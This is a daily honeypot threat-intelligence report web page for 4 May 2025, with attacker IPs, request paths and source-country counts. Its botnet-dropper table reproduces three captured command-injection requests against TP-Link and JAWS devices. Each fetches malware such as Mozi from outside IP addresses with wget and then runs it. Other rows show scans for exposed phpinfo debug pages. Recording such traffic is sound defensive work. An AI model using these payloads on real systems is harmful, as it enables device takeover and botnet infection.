Skip to main content
  1. Daily-Posts/

Report: 2025-05-04

·471 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-04
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 38 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1284 requests were recorded during the day, originating from 3 different countries, with a peak of 309 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
MDIsrael
USGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
45.95.147.209GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1
45.230.66.13GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.230.66.13:10207/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
185.218.84.39GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\x5C/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\x5C/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
314GET /files/logo.png HTTP/1.0
494GET /favicon.png HTTP/1.0
1721GET /config/index?time=1746374281881848921 HTTP/1.1
1771GET /api/bin/440393?time=1746324116250585247 HTTP/1.1
1781POST /api/user/binLookup?time=1746324116666705000 HTTP/1.1
1851\x00\x0E8\xED\xF5b\x90l\x10B\xAB\x00\x00\x00\x00\x00
1941GET /odinhttpcall1746352327 HTTP/1.1
1961\x00\x0E8\x836\xF3\xFE&\x93\xBAr\x00\x00\x00\x00\x00
2011\x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x11\x08\xA8\xC0\xD8C\xAEC\x95x/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xC5U@foU\xFA\xFDw\x9B[/Ua\x96\xFEI\x9B]v\xAD\xA4\xEF<za\xADg\xCCiM2\x80\x83i\xA9\x90l\xC1\xBD\x9C\x90\x9CZ\xF3\x1E\x97v\xFE\x81\x1EK\x84\xB4A\x0B\xFF\xE5\xAE\xA2\xEA\x80\xCF\x08f\xCF5Q\xC4Xb7B\xE6\xC4\xDFt \x91\x22+S/\x11\xAD\xAB\xA7\xD4V\xBA
2111GET /config/index?time=1746321857886113088 HTTP/1.1
2121GET /api/bin/440393?time=1746323417228562651 HTTP/1.1
2131POST /api/user/binLookup?time=1746323417719886430 HTTP/1.1
2141\x00\x0E8\xB9>y\x81\xEC\xAB\xA8\xF5\x00\x00\x00\x00\x00
2151GET /Odin/http/call1746352327 HTTP/1.1
2181GET /config/index?time=1746373380679290715 HTTP/1.1
2191GET /api/bin/440393?time=1746373447955576035 HTTP/1.1
2201POST /api/user/binLookup?time=1746373449123467933 HTTP/1.1
2301GET /index.php/_profiler/phpinfo HTTP/1.1
2311GET /index_dev.php/_profiler/phpinfo HTTP/1.1
2321GET /dev.php/_profiler/phpinfo HTTP/1.1
2331GET /_debug/_profiler/phpinfo HTTP/1.1
2431GET /test.php/_profiler/phpinfo HTTP/1.1
2451GET /debug/_profiler/phpinfo HTTP/1.1
2471GET /profiler/phpinfo HTTP/1.1
2501GET /OdinHttpCall1746352327 HTTP/1.1
2651GET /debug.php/_profiler/phpinfo HTTP/1.1
2701GET /frontend_dev.php/_profiler/phpinfo HTTP/1.1
2711GET /backend_dev.php/_profiler/phpinfo HTTP/1.1
2721GET /api_dev.php/_profiler/phpinfo HTTP/1.1
2731GET /app.php/_profiler/phpinfo HTTP/1.1
2741GET /app_test.php/_profiler/phpinfo HTTP/1.1
2761GET /config/index?time=1746321582188462063 HTTP/1.1
2771GET /api/bin/440393?time=1746322852895496875 HTTP/1.1
2781POST /api/user/binLookup?time=1746322853288445349 HTTP/1.1
3051GET /api/bin/440393?time=1746375420897080633 HTTP/1.1
3121\x00\x0E8\x1D\x86\x7F\x07\xB7\xE0\xA3\xC1\x00\x00\x00\x00\x00
3371POST /api/user/binLookup?time=1746375421304626215 HTTP/1.1
3421GET /config/index?time=1746322271535306402 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0309US
1223NL
2194GB
3148DE
476HK
558PL
653CN
745SC
822MD
919RU
1014CA
1112AZ
1211UA
1310KR
149BG
159GH
168AO
177JP
187BE
196IN
205AT
215RO
224SG
233VN
243CH
252CV
262AR
272MC
282CO
292AU
302ID
312SA
322NO
332NG
341HU
351LB
361ES
371PA
381ZA
391NZ

Related

Report: 2025-05-03
·440 words
Repport Daily
Report: 2025-05-02
·307 words
Repport Daily
Report: 2025-05-01
·9460 words
Repport Daily